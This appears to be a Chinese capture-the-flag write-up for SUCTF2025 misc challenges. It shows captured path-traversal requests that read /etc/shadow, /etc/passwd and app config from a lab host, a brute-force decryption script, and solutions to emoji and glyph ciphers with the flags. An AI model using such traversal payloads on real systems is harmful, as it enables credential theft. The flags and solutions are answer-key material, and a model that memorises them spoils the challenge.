SUCTF2025 Misc部分
Sky1ieSU_checkin
流量中响应码为200的数据
GET /download?filename=../../../../../../../../../root/flag.txt HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../root/flag.txt"
Content-Type: application/octet-stream
Content-Length: 7
Date: Thu, 09 Jan 2025 06:59:21 GMT
Keep-Alive: timeout=60
Connection: keep-alive
nonono
GET /download?filename=../../../../../../../../../proc/self/cmdline HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cmdline"
Content-Type: application/octet-stream
Content-Length: 65
Date: Thu, 09 Jan 2025 06:59:26 GMT
Keep-Alive: timeout=60
Connection: keep-alive
java-jarsuctf-0.0.1-SNAPSHOT.jar--password=SePassWordLen23SUCT
GET /download?filename=../../../../../../../../../root/start.sh HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../root/start.sh"
Content-Type: application/octet-stream
Content-Length: 1
Date: Thu, 09 Jan 2025 06:59:32 GMT
Keep-Alive: timeout=60
Connection: keep-alive
GET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/hint HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/hint"
Content-Type: application/octet-stream
Content-Length: 27
Date: Thu, 09 Jan 2025 06:59:38 GMT
Keep-Alive: timeout=60
Connection: keep-alive
algorithm=PBEWithMD5AndDES
GET /download?filename=../../../../../../../../../etc/shadow HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../etc/shadow"
Content-Type: application/octet-stream
Content-Length: 909
Date: Thu, 09 Jan 2025 06:59:43 GMT
Keep-Alive: timeout=60
Connection: keep-alive
root:$6$MI.uuGSS7qKn4rEK$NlYB/kaAeRmd3CYY4mxDuMMMh1PzQZHTEL.BV3Dosp.15kD3MgSDzqbYRRazeglIRVAfe6ATwRZ9ekSwNTkit0:20077:0:99999:7:::
daemon:*:20007:0:99999:7:::
bin:*:20007:0:99999:7:::
sys:*:20007:0:99999:7:::
sync:*:20007:0:99999:7:::
games:*:20007:0:99999:7:::
man:*:20007:0:99999:7:::
lp:*:20007:0:99999:7:::
mail:*:20007:0:99999:7:::
news:*:20007:0:99999:7:::
uucp:*:20007:0:99999:7:::
proxy:*:20007:0:99999:7:::
www-data:*:20007:0:99999:7:::
backup:*:20007:0:99999:7:::
list:*:20007:0:99999:7:::
irc:*:20007:0:99999:7:::
gnats:*:20007:0:99999:7:::
nobody:*:20007:0:99999:7:::
_apt:*:20007:0:99999:7:::
systemd-timesync:*:20077:0:99999:7:::
systemd-network:*:20077:0:99999:7:::
systemd-resolve:*:20077:0:99999:7:::
messagebus:*:20077:0:99999:7:::
sshd:*:20077:0:99999:7:::
hacker:$6$rzdplO02wm/607Io$v9gjdKBiuEdA0F28qx1REs/L4Qo9dqBQD.fUUjans5qn/sWOjSffHWzlMvgwzxHyyrfSA8kLilzMMRGhRNHLk0:20077:0:99999:7:::
GET /download?filename=../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../proc/self/cwd/BOOT-INF/classes/application.properties"
Content-Type: application/octet-stream
Content-Length: 133
Date: Thu, 09 Jan 2025 06:59:47 GMT
Keep-Alive: timeout=60
Connection: keep-alive
spring.application.name=suctf
server.port = 8888
OUTPUT=ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg=
GET /download?filename=../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.58.128
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
HTTP/1.1 200
Content-Disposition: attachment; filename="../../../../../../../../../etc/passwd"
Content-Type: application/octet-stream
Content-Length: 1322
Date: Thu, 09 Jan 2025 06:59:53 GMT
Keep-Alive: timeout=60
Connection: keep-alive
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:106::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
hacker:x:1000:1000::/home/hacker:/bin/bashshadow文件中hacker用户可爆破出密码hacker,但是没发现能用在哪
有用的
java -jarsuctf-0.0.1-SNAPSHOT.jar --password=SePassWordLen23SUCT
algorithm=PBEWithMD5AndDES
spring.application.name=suctf
server.port = 8888
OUTPUT=ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg=PBEWithMD5AndDES,OUTPUT貌似是密文,密码貌似是SePassWordLen23SUCT
根据密码翻译出密码长度为23,SePassWordLen23SUCT只有19位
SUCT,应该是SUCTF,那还有三位
爆破,PBEWithMD5AndDES解密脚本参考
https://github.com/binsgit/PBEWithMD5AndDES/blob/master/python/PBEWithMD5AndDES_2.py
简单修改,得到
import base64
import hashlib
import string
import itertools
from Crypto.Cipher import DES
def get_derived_key(password, salt, count):
if isinstance(password, str):
password = password.encode('utf-8')
key = password + salt
for i in range(count):
m = hashlib.md5(key)
key = m.digest()
return (key[:8], key[8:])
def decrypt(msg, password):
msg_bytes = base64.b64decode(msg)
salt = msg_bytes[:8]
enc_text = msg_bytes[8:]
(dk, iv) = get_derived_key(password, salt, 1000)
crypter = DES.new(dk, DES.MODE_CBC, iv)
decrypted_data = crypter.decrypt(enc_text)
padding_len = decrypted_data[-1]
text = decrypted_data[:-padding_len]
return text.decode('utf-8', errors='ignore')
def generate_passwords(known_part, length):
remaining_length = length - len(known_part)
characters = string.digits + string.ascii_uppercase + string.ascii_lowercase
for combination in itertools.product(characters, repeat=remaining_length):
yield known_part + ''.join(combination)
s = "ElV+bGCnJYHVR8m23GLhprTGY0gHi/tNXBkGBtQusB/zs0uIHHoXMJoYd6oSOoKuFWmAHYrxkbg="
known_part = "SePassWordLen23SUCTF"
total_length = 23
for password in generate_passwords(known_part, total_length):
print(password)
decrypted_text = decrypt(s, password)
if "SUCTF{" in decrypted_text:
print(f"Found password: {password}")
print(f"Decrypted text: {decrypted_text}")
break运行,得到
flag:SUCTF{338dbe11-e9f6-4e46-b1e5-eca84fb6af3f}
SU_RealCheckin
hello ctf -> 🏠🦅🍋🍋🍊 🐈🌮🍟
$flag -> 🐍☂️🐈🌮🍟{🐋🦅🍋🐈🍊🏔️🦅_🌮🍊_🐍☂️🐈🌮🍟_🧶🍊☂️_🐈🍎🌃_🌈🦅🍎🍋🍋🧶_🐬🍎🌃🐈🦅}根据hello ctf可发现是用了每个表情代表的事物的英文单词首字母
所以
🏠 -> h
🦅 -> e
🍋 -> l
🍊 -> o
🐈 -> c
🌮 -> t
🍟 -> f
🐍 -> s
☂️ -> u
🐋 -> w
🏔️ -> m
🧶 -> y
🍎 -> a
🌃 -> n
🌈 -> r
🐬 -> d替换得到
flag:suctf{welcome_to_suctf_you_can_really_dance}
SU_forensics
根据描述和常识,虽然删除了.bash_history这个文件,但是在磁盘中只是被允许覆写,而没有完全抹除。描述中的执行了sudo reboot十分重要,因为只有这条命令会被记载,后面的删除命令是不会被记录的。因此我们用diskgenius全盘搜索sudo reboot找到被删除的.bash_history
可以发现curl了一个博客园的文章,访问发现已经被删除了(404),这里利用web.archive.org查看页面快照:
有一个github项目,跟进发现这个叫做secret的branch已经被删除了,但是Activity还记着整个流程:
这里查看并提取lost_flag.txt,解压的脚本在项目中有,密码可以通过网页快照中的那个图片进行一些操作提取:
import binascii
import os
import pyzipper
# 定义文件和目录名
txt_filename = 'lost_flag.txt'
zip_filename = 'secret.zip'
output_dir = 'lost_flag'
password = '2phxMo8iUE2bAVvdsBwZ'
# 读取文本文件中的十六进制数据
with open(txt_filename, 'r') as txt_file:
hex_data = txt_file.read().strip()
# 将十六进制数据转换回二进制数据
binary_data = binascii.unhexlify(hex_data)
# 将二进制数据写入到ZIP文件中
with open(zip_filename, 'wb') as zip_file:
zip_file.write(binary_data)
# 创建输出目录
os.makedirs(output_dir, exist_ok=True)
# 使用pyzipper解压缩ZIP文件
with pyzipper.AESZipFile(zip_filename, 'r', compression=pyzipper.ZIP_DEFLATED, encryption=pyzipper.WZ_AES) as extracted_zip:
extracted_zip.extractall(output_dir, pwd=str.encode(password))
print(f"文件已解压缩并保存到目录 {output_dir}")拿到lost_flag.png图片.
一堆鬼画符,观察可发现共有27中规划符,猜测是26个字母加上空格
发现每段鬼画符中每隔几个鬼画符都会有一个
猜测这个代表空格
分割图片获得每张图片对应的顺序
from PIL import Image
import zlib
import os
def calculate_crc(image):
image_bytes = image.tobytes()
return zlib.crc32(image_bytes)
def split_and_save(image_path, rect_size):
image = Image.open(image_path)
image_width, image_height = image.size
rect_width, rect_height = rect_size
seen_crc = set()
output_dir = 'output_images'
os.makedirs(output_dir, exist_ok=True)
image_counter = 1
for top in range(0, image_height, rect_height):
for left in range(0, image_width, rect_width):
box = (left, top, left + rect_width, top + rect_height)
cropped_image = image.crop(box)
crc = calculate_crc(cropped_image)
if crc in seen_crc:
continue
seen_crc.add(crc)
cropped_image_path = os.path.join(output_dir, f'img_{image_counter}.png')
cropped_image.save(cropped_image_path)
print(f'Saved: {cropped_image_path}')
image_counter += 1
split_and_save('./lost_flag.png', (138, 108))运行得到
共28张图片,其中第二张
倒数第二张
最后一张
根据此作表,将鬼画符转为字母
from PIL import Image
image = Image.open('./lost_flag.png')
rect_size = 138, 108
chrset = 'a bcdefghijklmnopqrstuvwxy#z'
m = {}
code = ''
for j in range(12):
for i in range(69):
x, y = i * rect_size[0], j * rect_size[1]
region = image.crop((x, y, x + rect_size[0], y + rect_size[1]))
if region.tobytes() not in m:
m[region.tobytes()] = chrset[len(m)]
ch = m[region.tobytes()]
if ch != '#':
code += ch
code += '\n'
print(code)运行得到
a bcdef ghijkl mnop qhrdst uavw xdy
vlhu zihedandghu ds wjh xom ov yafdst qhlk bamandzwde par wokz
zdr vlhsgdhu fdstz qophu wo amondzj yk bcdwh idwdvcn xoczwz
yak xo hbcan yk voondzj lheolu mk zonqdst zdr icggnhz a phhf
jallk dz xottdst bcdefnk pjdej arhu ghs yosfz pdwj amcsuasw qaiol
ucyik fdmdwghl xdstnhz az bcdrowde oqhlvnopz
skyij zdst vol bcdef xdtz qhr mcu ds ghzwvcn wpdndtjw
zdyinh vor jhnu bcalwg ucef xczw mk pdst
zwlost mldef bcdg pjastz xcyik vor qdqdunk
tjozwz ds yhyolk idefz ci bcalwg asu qancamnh oskr xhphnz
ihszdqh pdgaluz yafh worde mlhp vol wjh hqdn bawald fdst asu plk xaef
ann ocwuawhu bchlk azfhu mk vdqh pawej hrihlwz ayaghu wjh xcuthquipquip得到
a quick zephyr blow vexing daft jim
fred specialized in the job of making very qabalistic wax toys
six frenzied kings vowed to abolish my quite pitiful jousts
may jo equal my foolish record by solving six puzzles a week
harry is jogging quickly which axed zen monks with abundant vapor
dumpy kibitzer jingles as quixotic overflows
nymph sing for quick jigs vex bud in zestful twilight
simple fox held quartz duck just by wing
strong brick quiz whangs jumpy fox vividly
ghosts in memory picks up quartz and valuable onyx jewels
pensive wizards make toxic brew for the evil qatari king and wry jack
all outdated query asked by five watch experts amazed the judge翻译后,百度后发现是一些能包含全部26个字母的短句,参考
https://www.fleetingimage.com/wij/gd212/01-pangrams.html
对比句子发现
a quick zephyr blow vexing daft jim
Quick zephyrs blow, vexing daft Jim.与网站内的句子相比,我们的句子缺少了s。发现后续句子也同样只包含25个字母,于是检查每个句子缺少了哪个字母
import string
def find_missing_letters(sentence):
all_letters = set(string.ascii_lowercase)
sentence_letters = set(sentence.lower())
missing_letters = all_letters - sentence_letters
return missing_letters
sentences = [
"a quick zephyr blow vexing daft jim",
"fred specialized in the job of making very qabalistic wax toys",
"six frenzied kings vowed to abolish my quite pitiful jousts",
"may jo equal my foolish record by solving six puzzles a week",
"harry is jogging quickly which axed zen monks with abundant vapor",
"dumpy kibitzer jingles as quixotic overflows",
"nymph sing for quick jigs vex bud in zestful twilight",
"simple fox held quartz duck just by wing",
"strong brick quiz whangs jumpy fox vividly",
"ghosts in memory picks up quartz and valuable onyx jewels",
"pensive wizards make toxic brew for the evil qatari king and wry jack",
"all outdated query asked by five watch experts amazed the judge"
]
for i, sentence in enumerate(sentences, 1):
missing = find_missing_letters(sentence)
print(''.join(sorted(missing)), end="")运行得到
flag:SUCTF{HAVEFUN}